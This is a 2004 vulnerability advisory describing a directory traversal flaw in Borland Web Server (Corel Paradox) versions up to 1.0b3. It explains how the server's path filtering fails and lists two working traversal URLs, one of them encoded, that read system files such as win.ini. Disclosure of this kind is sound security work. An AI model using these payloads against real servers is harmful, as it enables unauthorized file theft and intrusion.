~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: BWS (Borland Web Server / (Corel Paradox) Vendors: http://www.Borland.com http://www.Corel.com Corporate mergers confuses the specified vendor. Versions: <= 1.0b3 Platforms: Windows Bug: Directory Transversal Vulnerability Risk: High Exploitation: remote with browser Date: 24 Jan 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider@mail.com web: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bug 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== BWS is an old web server used as a webserver for "Corel Paradox relational database web interface". This server was version was built in year 98, and is mostly running on win98. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== The webserver uses a protection to avoid the directory traversal bug. "//" is replaced to "" "\." and "\.." is replaced to "" "\" is replaced to "/" "\\" is replaced to "//" The server is also protected from classic Directory Transversal "/../". The problem happens when the attacker uses the pattern: "/..................../" Or "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c" (Encoded version of "\..\..\..\..\"). Which allows him to see and download any file in the remote system knowing the path. This allows any attacker to : Read and download any local file, and in most cases retrieve the machine's password files and invade it (using ssh,ftp,http,netbios,samba etc...). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== http:///%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini http:///..................../autoexec.bat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Things that are unlikeable, are NOT impossible."